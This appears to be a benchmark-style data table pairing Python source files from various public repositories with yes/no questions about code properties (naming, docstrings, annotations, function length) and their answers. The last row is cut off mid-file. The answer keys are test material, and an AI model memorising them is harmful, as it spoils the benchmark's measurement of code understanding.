source string | points list | n_points int64 | path string | repo string |
|---|---|---|---|---|
__author__ = 'tester'
import re
def test_phones_on_home_page(app):
contact_from_home_page = app.contact.get_contact_list()[0]
contact_from_edit_page = app.contact.get_contact_info_from_edit_page(0)
assert contact_from_home_page.all_phones_from_home_page == merge_phones_like_on_home_page(contact_from_edit_page)
def test_phones_on_contact_view_page(app):
contact_from_view_page = app.contact.get_contact_from_view_page(0)
contact_from_edit_page = app.contact.get_contact_info_from_edit_page(0)
assert contact_from_view_page.homephone == contact_from_edit_page.homephone
assert contact_from_view_page.mobilephone == contact_from_edit_page.mobilephone
assert contact_from_view_page.workphone == contact_from_edit_page.workphone
assert contact_from_view_page.secondaryphone == contact_from_edit_page.secondaryphone
def clear(s):
return re.sub("[() -]", "", s)
def merge_phones_like_on_home_page(contact):
return "\n".join(filter(lambda x: x != "",
map(lambda x: clear(x),
filter(lambda x: x is not None,
[contact.homephone, contact.mobilephone, contact.workphone, contact.secondaryphone]))))
| [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excludi... | 3 | test/test_phones.py | EwgOskol/python_training |
"""0.10.0 create new schedule tables
Revision ID: 493871843165
Revises: 942138e33bf9
Create Date: 2021-01-13 14:43:03.678784
"""
from dagster.core.storage.migration.utils import create_0_10_0_schedule_tables
# revision identifiers, used by Alembic.
revision = "493871843165"
down_revision = "942138e33bf9"
branch_labels = None
depends_on = None
def upgrade():
create_0_10_0_schedule_tables()
def downgrade():
pass
| [
{
"point_num": 1,
"id": "all_return_types_annotated",
"question": "Does every function in this file have a return type annotation?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answe... | 3 | python_modules/dagster/dagster/core/storage/alembic/versions/014_0_10_0_create_new_schedule_tables_postgres.py | asamoal/dagster |
#!/usr/bin/python3
from argparse import ArgumentParser
import subprocess
def main():
parser = ArgumentParser()
parser.add_argument('--version', required=True)
args = parser.parse_args()
version = args.version
_create_package(version)
def _create_package(version):
options = {
'depends': [
"supervisor",
"python3",
"python3-dev",
"python3-pip",
"git",
"curl",
"mc",
"less",
"software-properties-common",
"wget",
"vim",
"gcc",
"unzip",
"apt-utils",
"net-tools",
"cron",
"netcat",
"sudo",
"file",
"iproute2",
"bash-completion"
],
'suggests': [
"haproxy"
]
}
fpm_options = [
"fpm",
"-t", "deb",
"-s", "dir",
"--description", "armada",
"-C", './microservice',
"--license", "\"Apache 2.0\"",
"--maintainer", "cerebro@ganymede.eu",
"--url", "armada.sh",
"--after-install", 'after-install.sh',
"--after-remove", 'after-remove.sh',
"--template-scripts",
"--name", 'armada-microservice',
"--version", version,
"--architecture", 'x86_64',
]
for dep in options['depends']:
fpm_options += ['--depends', dep]
for dep in options['suggests']:
fpm_options += ['--deb-suggests', dep]
subprocess.check_call(fpm_options)
print('OK')
if __name__ == '__main__':
main()
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": false
},
{
"point_num": 2,
"id": "any_function_over_40_lines",
"question": "Is any function in this file longer than 40 lines?",
"answer": true
... | 3 | docker-containers/microservice_focal/packaging/package_build.py | b-bird/armada |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
import logging
from doubanfm.views import help_view
from doubanfm.controller.lrc_controller import LrcController
logger = logging.getLogger('doubanfm') # get logger
class HelpController(LrcController):
"""
按键控制
"""
def __init__(self, player, data, queue):
# 接受player, data, view
super(HelpController, self).__init__(player, data, queue)
self.view = help_view.Help(self.data)
def _bind_view(self):
self.view = help_view.Help(self.data)
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/... | 3 | doubanfm/controller/help_controller.py | fakegit/douban.fm |
from typing import List
import numpy as np
from .mesh import StudioMesh
from .....library.utils.byte_io_mdl import ByteIO
class StudioModel:
vertex_dtype = np.dtype([
('id', np.uint32, (1,)),
('pos', np.float32, (3,)),
])
def __init__(self):
self.name = ''
self.unk_1 = 0
self.unk_2 = 0
self.bounding_radius = 0.0
self.vertex_count = 0
self.normal_count = 0
self.mesh_count = 0
self._vertices = np.array([])
self._normals = np.array([])
self.meshes: List[StudioMesh] = []
@property
def bone_vertex_info(self):
return self._vertices['id'].flatten()
@property
def bone_normal_info(self):
return self._normals['id'].flatten()
@property
def vertices(self):
return self._vertices['pos']
@property
def normals(self):
return self._normals['pos']
def read(self, reader: ByteIO):
self.name = reader.read_ascii_string(32)
(self.unk_1, self.unk_2,
self.bounding_radius,
self.vertex_count,
self.normal_count,
self.mesh_count,
) = reader.read_fmt('2if3i')
self._vertices = np.frombuffer(reader.read(16 * self.vertex_count), self.vertex_dtype)
self._normals = np.frombuffer(reader.read(16 * self.normal_count), self.vertex_dtype)
for _ in range(self.mesh_count):
mesh = StudioMesh()
mesh.read(reader)
self.meshes.append(mesh)
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},... | 3 | library/goldsrc/mdl_v4/structs/model.py | anderlli0053/SourceIO |
import pytest
from thedarn.rules.java import match, get_new_command
from thedarn.types import Command
@pytest.mark.parametrize('command', [
Command('java foo.java', ''),
Command('java bar.java', '')])
def test_match(command):
assert match(command)
@pytest.mark.parametrize('command, new_command', [
(Command('java foo.java', ''), 'java foo'),
(Command('java bar.java', ''), 'java bar')])
def test_get_new_command(command, new_command):
assert get_new_command(command) == new_command
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (... | 3 | tests/rules/test_java.py | frankhli843/thedarn |
import numpy as np
from numpy.testing import assert_allclose, assert_equal
import unittest
from pb_bss.distribution import VonMisesFisher
from pb_bss.distribution import VonMisesFisherTrainer
class TestGaussian(unittest.TestCase):
def test_shapes(self):
samples = 10000
mean = np.ones((3,))
covariance = np.eye(3)
x = np.random.multivariate_normal(mean, covariance, size=(samples,))
model = VonMisesFisherTrainer().fit(x)
assert_equal(model.mean.shape, mean.shape)
assert_equal(model.concentration.shape, ())
def test_shapes_independent_dims(self):
samples = 10000
mean = np.ones((3,))
covariance = np.eye(3)
x = np.random.multivariate_normal(mean, covariance, size=(13, samples,))
model = VonMisesFisherTrainer().fit(x)
assert_equal(model.mean.shape, np.tile(mean, (13, 1)).shape)
assert_equal(model.concentration.shape, (13,))
def test_von_mises_fisher(self):
samples = 10000
mean = np.ones((3,))
mean /= np.linalg.norm(mean, axis=-1)
concentration = 50
# ToDo: Implement VonMisesFisher(...).sample(...)
return
x = VonMisesFisher(mean, concentration).sample(size=(samples,))
model = VonMisesFisherTrainer().fit(x)
assert_allclose(model.mean, mean, atol=0.1)
assert_allclose(model.covariance, concentration, atol=0.1)
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": ... | 3 | tests/test_distribution/test_von_mises_fisher.py | mdeegen/pb_bss |
from tkinter import *
import tkinter.font
from gpiozero import LED
import RPi.GPIO
RPi.GPIO.setmode(RPi.GPIO.BCM)
### HARDWARE DEFINITIONS ###
# LED pin definitions
led0 = LED(7)
led1 = LED(8)
led2 = LED(25)
led3 = LED(23)
led4 = LED(24)
led5 = LED(18)
led6 = LED(15)
led7 = LED(14)
# Arrange LEDs into a list
leds = [led7,led6,led5,led4,led3,led2,led1,led0]
### GUI DEFINITIONS ###
win=Tk()
win.title("LED Controller")
myFont=tkinter.font.Font(family = 'Helvetica', size = 12, weight = "bold")
ledCode = StringVar()
### Event Functions ###
def ledShow():
ledCode = code.get()
print("LED code: ", ledCode) #Debug
i=0 #loop-counter
# For each character in the ledCode string, check if = 1 and if so,
# turn on the corresponding LED
for c in ledCode:
if c == "1":
leds[i].on()
else:
leds[i].off()
i+=1
def close(): # Cleanly close the GUI and cleanup the GPIO
RPi.GPIO.cleanup()
win.destroy()
### WIDGETS ###
ledButton = Button(win, text='Load LED code', font=myFont, command=ledShow, bg='bisque2', height=1)
ledButton.grid(row=0,column=1)
code = Entry(win, font=myFont, width=10)
code.grid(row=0,column=0)
exitButton = Button(win, text='Exit', font=myFont, command=close, bg='red', height=1, width=6)
exitButton.grid(row=3,column=1, sticky=E)
win.protocol("WM_DELETE_WINDOW", close) # cleanup GPIO when user closes window
win.mainloop() # Loops forever | [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"... | 3 | led-command-centre.py | kazma89/Taller_RPi |
import pytest
from skidl import *
from .setup_teardown import *
def test_pin_names_1():
codec = Part("xess.lib", "ak4520a")
assert codec["ain"] == codec.n["ain"]
assert codec[1:4] == codec.p[1:4]
def test_pin_names_2():
codec = Part("xess.lib", "ak4520a")
codec[4].name = "A1"
codec[8].name = "A2"
codec[8].num = "A1"
assert codec[4] is codec.n["A1"]
assert codec.p[4] is codec.n["A1"]
assert codec[4] is codec.p[4]
assert codec.p["A1"] is codec.n["A2"]
assert codec["A1"] is codec.n["A2"]
assert codec["A1"] is codec.p["A1"]
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"ans... | 3 | tests/test_pin_num_name.py | arjenroodselaar/skidl |
import json
from urllib.parse import urlparse
from django.db.models import Q
from django.utils.encoding import smart_text
def get_url_path(url):
parsed_url = urlparse(url)
return parsed_url.path
def get_redirect_location(response):
# Due to Django 1.8 compatibility, we have to handle both cases
return get_url_path(response['Location'])
def filter_products_by_attribute(queryset, attribute_id, value):
key = smart_text(attribute_id)
value = smart_text(value)
in_product = Q(attributes__contains={key: value})
in_variant = Q(variants__attributes__contains={key: value})
return queryset.filter(in_product | in_variant)
def get_graphql_content(response):
return json.loads(response.content.decode('utf8'))
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding se... | 3 | tests/utils.py | skazancev/saleor |
from allennlp_demo.common.testing import ModelEndpointTestCase
from allennlp_demo.ccg_supertagging.api import CCGSupertaggingModelEndpoint
class TestCCGSupertaggingModelEndpoint(ModelEndpointTestCase):
endpoint = CCGSupertaggingModelEndpoint()
predict_input = {
"sentence": "Did Uriah honestly think he could beat The Legend of Zelda in under three hours?"
}
attack_input = None
predict_okay = None
def test_predict(self):
"""
Test the /predict route.
"""
if self.predict_okay:
return
response = self.client.post("/predict", json=self.predict_input)
# print('response', response)
# print(response.is_json)
# print(response.headers)
# print(response.data)
# print(response.__dict__)
self.check_response_okay(response, cache_hit=False)
responseData = response.get_json()
# self.attack_input = { k: {'tags': inst['tags'], 'words': inst['words']}
# for k, inst in responseData.items() }
self.attack_input = { '0': {'tags': responseData['0']['tags'], 'words': responseData['0']['words']} }
self.predict_okay = True
def test_attack(self):
if self.attack_input is None:
# assert False, 'Need to run predict before running attacks.'
self.test_predict()
inputs = dict(
inputs=self.attack_input,
input_field_to_attack="tokens",
grad_input_field="grad_input_1",
ignore_tokens=None,
target=None)
response = self.client.post("/attack/input_reduction", json=inputs)
# print(response)
# print(response.is_json)
# print(response.headers)
# print(response.data)
# print(response.__dict__)
self.check_response_okay(response, cache_hit=False)
| [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true... | 3 | api/allennlp_demo/ccg_supertagging/test_api.py | jakpra/allennlp-demo |
import os
import json
import random as rn
class Process_pr:
def __init__(self, pr_number, pr_author):
self.__pr_number = pr_number
self.__pr_author = pr_author
def author(self):
return self.__pr_author
def pr_number(self):
return self.__pr_number
def command(self, cmd, save_output=True):
try:
if save_output:
return json.loads(os.popen(cmd).read())
else:
os.system(cmd)
except json.decoder.JSONDecodeError:
print("PR doesn't exist. Exiting process!")
exit()
def assign_intern(self, ivy_intern):
# --add-reviewer "{ivy_intern}"
# Need to find a way how to overcome the permissions for GH Actions
self.command(
f'gh pr edit {self.pr_number()} --add-assignee "{ivy_intern}"',
save_output=False,
)
def assign_random_intern(self, intern_list):
random_intern = rn.choice(intern_list)
# --add-reviewer "{random_intern}"
# Need to find a way how to overcome the permissions for GH Actions
self.command(
f'gh pr edit {self.pr_number()} --add-assignee "{random_intern}"',
save_output=False,
)
print(f"[+] {random_intern} was assigned to PR {self.pr_number()}")
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written... | 3 | automation_tools/pr_automation/process_pr.py | VedPatwardhan/ivy |
# Copyright (c) 2021 Johnathan P. Irvin
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from abc import ABC, abstractmethod
from starlette.types import Message
class AbstractSocket(ABC):
"""Abstract class for a socket."""
@abstractmethod
async def send(self, message: Message) -> None:
"""
Send a message to the socket.
Args:
message (Message): The message to send.
"""
pass
@abstractmethod
async def receive(self) -> Message:
"""
Receive data from the socket.
Returns:
Message: The message received.
"""
pass
@abstractmethod
async def accept(self) -> None:
"""
Accept a connection.
Args:
subprotocol (str): The subprotocol to use.
"""
pass
@abstractmethod
async def close(self):
"""Close the socket."""
pass | [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer":... | 3 | viking/connections/interfaces/abstract_socket.py | JohnnyIrvin/CommunicateProject |
"""Compatibility constants and helpers for Python 2.x and 3.x.
"""
import sys
# NB If this module grows to more than a handful of items it is probably
# to bite the bullet and depend on the six package.
__all__ = [
'string_types',
'binary_type',
'text_type',
'int2byte',
'byte2int'
]
# Needed for isinstance() checks
# Same behaviour as six.string_types https://pythonhosted.org/six/#constants
if sys.version_info < (3, 0):
# Python 2.x
_PY2 = True
string_types = (basestring,) # noqa: F821
binary_type = str
text_type = unicode # noqa: F821
else:
# Python 3.x
_PY2 = False
string_types = (str,)
binary_type = bytes
text_type = str
def int2byte(i):
if _PY2:
return chr(i)
return bytes((i,))
def byte2int(i):
if _PY2:
return ord(i)
return i
| [
{
"point_num": 1,
"id": "all_return_types_annotated",
"question": "Does every function in this file have a return type annotation?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answe... | 3 | sdk/python-yubicommon/yubicommon/compat.py | lucusfly/iost-ledger-app |
from .modal_type_enum import *
class Modal:
def __init__(
self, message: str = "", type: MODAL_TYPE = MODAL_TYPE.SUCCESS, headline: str = "Hinweis"
):
self.modal_type = type
self.modal_msg = message
self.modal_headline = headline
def to_dict(self):
tmp_dict = {
"modal_type": self.modal_type.value,
"modal_msg": self.modal_msg,
"modal_headline": self.modal_headline,
}
return tmp_dict | [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than class... | 3 | sws_webstuff/modal_class.py | Aurvandill137/sws_webstuff |
"""Importer decorators."""
import logging
from functools import wraps
logger = logging.getLogger(__name__) # pylint: disable=invalid-name
class ImporterHook:
"""Interface for an importer hook."""
def __call__(self, importer, file, imported_entries, existing_entries):
"""Apply the hook and modify the imported entries.
Args:
importer: The importer that this hooks is being applied to.
file: The file that is being imported.
imported_entries: The current list of imported entries.
existing_entries: The existing entries, as passed to the extract
function.
Returns:
The updated imported entries.
"""
raise NotImplementedError
def apply_hooks(importer, hooks):
"""Apply a list of importer hooks to an importer.
Args:
importer: An importer instance.
hooks: A list of hooks, each a callable object.
"""
unpatched_extract = importer.extract
@wraps(unpatched_extract)
def patched_extract_method(file, existing_entries=None):
logger.debug("Calling the importer's extract method.")
imported_entries = unpatched_extract(
file, existing_entries=existing_entries
)
for hook in hooks:
imported_entries = hook(
importer, file, imported_entries, existing_entries
)
return imported_entries
importer.extract = patched_extract_method
return importer
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fe... | 3 | smart_importer/hooks.py | EINDEX/smart_importer |
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
import os
import unittest
from functional_tests.data.atlas.skulls.run import AtlasSkulls
from functional_tests.data.atlas.brain_structures.run import AtlasBrainStructures
from functional_tests.data.atlas.digits.run import AtlasDigits
from functional_tests.data.regression.skulls.run import RegressionSkulls
TEST_MODULES = [AtlasSkulls, AtlasBrainStructures, AtlasDigits, RegressionSkulls]
def setup_conda_env():
path_to_environment_file = os.path.normpath(
os.path.join(os.path.abspath(__file__), '../../../environment.yml'))
cmd = 'hostname && ' \
'if [ -f ~/.profile ]; then . ~/.profile; fi &&' \
'conda env create -f %s' % path_to_environment_file
os.system(cmd)
def main():
import logging
logger = logging.getLogger(__name__)
logger.addHandler(logging.StreamHandler())
logger.setLevel(logging.DEBUG)
setup_conda_env()
for t in TEST_MODULES:
unittest.TextTestRunner(verbosity=2).run(unittest.TestLoader().loadTestsFromTestCase(t))
if __name__ == '__main__':
main()
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"ans... | 3 | tests/functional_tests/run_functional_tests.py | EuroPOND/deformetrica |
"""
Created on June 21, 2018
@author: Moritz
"""
import numpy as np
from spn.algorithms.Inference import add_node_likelihood
from spn.experiments.AQP.leaves.static.StaticNumeric import StaticNumeric
def static_likelihood_range(node, ranges, dtype=np.float64, **kwargs):
assert len(node.scope) == 1, node.scope
probs = np.ones((ranges.shape[0], 1), dtype=dtype)
ranges = ranges[:, node.scope[0]]
for i, rang in enumerate(ranges):
# Skip if no range is specified aka use a log-probability of 0 for that instance
if rang is None:
continue
# Skip if no values for the range are provided
if rang.is_impossible():
probs[i] = 0
# Compute the sum of the probability of all possible values
probs[i] = sum([_compute_probability_for_range(node, interval) for interval in rang.get_ranges()])
return probs
def _compute_probability_for_range(node, interval):
if len(interval) == 1:
if node.val == interval[0]:
return 1
else:
return 0
else:
lower = interval[0]
higher = interval[1]
if lower <= node.val and node.val <= higher:
return 1
else:
return 0
def add_static_inference_range_support():
add_node_likelihood(StaticNumeric, static_likelihood_range)
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"ans... | 3 | src/spn/experiments/AQP/leaves/static/InferenceRange.py | tkrons/SPFlow_topdownrules |
import os
from instaloader import Profile, Post
class IgpdLinuxFeaturesPrivate:
def download_post(self,link,p_instance_param):
pid = link.rsplit("/",2)[-2]
post = Post.from_shortcode(p_instance_param.context, pid)
p_instance_param.download_post(post,target=(pid))
print("\nPost downloaded successful and saved in -- "+ pid)
def download_story(self,s_username,s_instance_param):
profile = Profile.from_username(s_instance_param.context, username=s_username)
s_instance_param.download_stories(userids=[profile.userid],filename_target='{}/stories'.format(profile.username))
print("Story downloaded successfully and saved as {}/stories".format(profile.username))
def download_highlights(self,h_username,h_instance_param):
profile = Profile.from_username(h_instance_param.context, username= h_username)
for highlight in h_instance_param.get_highlights(user=profile):
# highlight is a Highlight object
for item in highlight.get_items():
# item is a StoryItem object
h_instance_param.download_storyitem(item, '{}/{}'.format(highlight.owner_username, highlight.title))
print("\nHighlights downloaded successful and saved as {}/{}".format(highlight.owner_username, highlight.title))
def download_profile(self,pf_username,pf_instance_param):
pf_instance_param.download_profile(profile_name=pf_username)
print("\nProfile download successful and saved as -- "+ pf_username)
class IgpdLinuxFeaturesPublic:
def download_pri(self,link):
pid = link.rsplit("/",2)[-2]
os.system(f"instaloader -- -{pid}")
def download_profile(self,username):
os.system(f"instaloader {username}")
| [
{
"point_num": 1,
"id": "every_class_has_docstring",
"question": "Does every class in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true... | 3 | src/features.py | ahn1305/igpd-linux |
# -*- coding: utf-8 -*-
###########################################################################
# Copyright (c), The AiiDA team. All rights reserved. #
# This file is part of the AiiDA code. #
# #
# The code is hosted on GitHub at https://github.com/aiidateam/aiida-core #
# For further information on the license, see the LICENSE.txt file #
# For further information please visit http://www.aiida.net #
###########################################################################
"""Tests for `verdi status`."""
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
from click.testing import CliRunner
from aiida.backends.testbase import AiidaTestCase
from aiida.cmdline.commands import cmd_status
from aiida.backends.tests.utils.configuration import with_temporary_config_instance
class TestVerdiStatus(AiidaTestCase):
"""Tests for `verdi status`."""
def setUp(self):
self.cli_runner = CliRunner()
@with_temporary_config_instance
def test_status_1(self):
"""Test running verdi status.
Note: The exit status may differ depending on the environment in which the tests are run.
Also cannot check for the exit status to see if connecting to all services worked, because
the profile might not be properly setup in this temporary config instance unittest.
"""
options = []
result = self.cli_runner.invoke(cmd_status.verdi_status, options)
self.assertIsInstance(result.exception, SystemExit)
self.assertIn('profile', result.output)
self.assertIn('postgres', result.output)
self.assertIn('rabbitmq', result.output)
self.assertIn('daemon', result.output)
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false... | 3 | aiida/backends/tests/cmdline/commands/test_status.py | lekah/aiida_core |
from math import sqrt, floor
def solution(n):
if n<3 or n>200:
return 0
else:
sum = 0
cache = []
for x in range(0, n):
temp = []
for y in range(0, n):
temp.append(-1)
cache.append(temp)
for i in range(int(floor(sqrt(n*2))), n):
sum += recurse(n-i, i, cache)
return sum
def recurse(remaining, prev, cache):
if remaining == 0:
return 0
if prev == 1:
return 0
if cache[remaining][prev] != -1:
return cache[remaining][prev]
if remaining < prev:
return 0
elif remaining == 0:
return 1
sum = 0
if prev > remaining:
sum += 1
for i in range(int(floor(sqrt(remaining*2))), remaining):
if i >= prev:
break
sum += recurse(remaining-i, i, cache)
cache[remaining][prev] = sum
return sum
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a ty... | 3 | the_grandest_step_of_them_all.py | sakurusurya2000/FOOBAR |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from photoCoordinates import photoCoordinates
from PIL import Image, ImageFont, ImageDraw
class photoImposer:
pc = photoCoordinates()
allCoordinates = pc.allCoordinates
all_images = {}
def __init__(self):
self.all_images['KICKOFF'] = "formationImages/kickoff_coverage.png"
self.all_images['KICKOFF_RETURN'] = "formationImages/kickoff_return.png"
self.all_images['PUNT'] = "formationImages/punt_coverage.png"
self.all_images['PUNT_RETURN'] = "formationImages/punt_return.png"
self.all_images['FIELDGOAL'] = "formationImages/fieldgoal_coverage.png"
self.all_images['FIELDGOAL_BLOCK'] = "formationImages/fieldgoal_block.png"
def imposeDataOnImage(self, playType, countsAndRatingsData, downloadPath):
coordinates = self.allCoordinates.get(playType)
image = Image.open(self.all_images.get(playType))
font = ImageFont.truetype('arial_bold.ttf', size=13)
draw = ImageDraw.Draw(image)
for position, positional_group in countsAndRatingsData.groupby(['POSITION']):
(x, y) = (0, 0)
if position in coordinates:
(x, y) = coordinates.get(position)
message = ''
for index, player in positional_group.iterrows():
message = message + str(player["PLAYER"]) + " " + str(player["COUNT"]) + " " + str(player["RATING"]) + '\n'
color = 'rgb(0, 0, 0)'
draw.text((x, y), message, fill=color, font=font)
imagename = './' + downloadPath + '/' + playType + '_ANALYSIS.png'
image.save(imagename)
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inherita... | 3 | backend/src/photoImposer.py | jayeshjakkani/American-Football-Analytics-Application |
from som.primitives.primitives import Primitives
from som.vmobjects.primitive import UnaryPrimitive
def _holder(rcvr):
return rcvr.get_holder()
def _signature(rcvr):
return rcvr.get_signature()
class InvokablePrimitivesBase(Primitives):
def install_primitives(self):
self._install_instance_primitive(UnaryPrimitive("holder", self._universe, _holder))
self._install_instance_primitive(UnaryPrimitive("signature", self._universe, _signature))
| [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},... | 3 | src/som/primitives/invokable_primitives.py | smarr/RPySOM |
import bpy
import bmesh
from bpy.props import *
from ... base_types import AnimationNode
class CreateBMeshFromMesh(bpy.types.Node, AnimationNode):
bl_idname = "an_CreateBMeshFromMeshNode"
bl_label = "Create BMesh"
errorHandlingType = "EXCEPTION"
def create(self):
self.newInput("Mesh", "Mesh", "meshData")
self.newOutput("BMesh", "BMesh", "bm")
def execute(self, meshData):
try:
return getBMeshFromMesh(meshData)
except IndexError as e:
self.raiseErrorMessage("Missing vertices")
except ValueError as e:
self.raiseErrorMessage("Multiple identical edges or polygons")
def getBMeshFromMesh(meshData):
bm = bmesh.new()
for co in meshData.vertices:
bm.verts.new(co)
# for Blender Version >= 2.73
try: bm.verts.ensure_lookup_table()
except: pass
for edgeIndices in meshData.edges:
bm.edges.new((bm.verts[edgeIndices[0]], bm.verts[edgeIndices[1]]))
for polygonIndices in meshData.polygons:
bm.faces.new(tuple(bm.verts[index] for index in polygonIndices))
bm.normal_update()
return bm
| [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"ans... | 3 | scripts/addons/animation_nodes/nodes/mesh/bmesh_create.py | Tilapiatsu/blender-custom_conf |
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
import sys, os
from pathlib import Path
import qlib
import fire
import pandas as pd
import ruamel.yaml as yaml
from qlib.config import C
from qlib.model.trainer import task_train
def get_path_list(path):
if isinstance(path, str):
return [path]
else:
return [p for p in path]
def sys_config(config, config_path):
"""
Configure the `sys` section
Parameters
----------
config : dict
configuration of the workflow.
config_path : str
path of the configuration
"""
sys_config = config.get("sys", {})
# abspath
for p in get_path_list(sys_config.get("path", [])):
sys.path.append(p)
# relative path to config path
for p in get_path_list(sys_config.get("rel_path", [])):
sys.path.append(str(Path(config_path).parent.resolve().absolute() / p))
# worflow handler function
def workflow(config_path, experiment_name="workflow", uri_folder="mlruns"):
with open(config_path) as fp:
config = yaml.load(fp, Loader=yaml.SafeLoader)
# config the `sys` section
sys_config(config, config_path)
exp_manager = C["exp_manager"]
exp_manager["kwargs"]["uri"] = "file:" + str(Path(os.getcwd()).resolve() / uri_folder)
qlib.init(**config.get("qlib_init"), exp_manager=exp_manager)
task_train(config.get("task"), experiment_name=experiment_name)
# function to run worklflow by config
def run():
fire.Fire(workflow)
if __name__ == "__main__":
run()
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": fal... | 3 | qlib/workflow/cli.py | GoooIce/qlib |
from .confirmacionMensaje import ConfirmacionMensaje
from .mensajeEnviado import MensajeEnviado
from .estadoMensaje import EstadoMensaje
class MensajeParcialmenteEnviado(EstadoMensaje):
#Colaboradores externos
#confirmaciones: Conjunto<ConfirmacionMensaje>
#msg: Mensaje
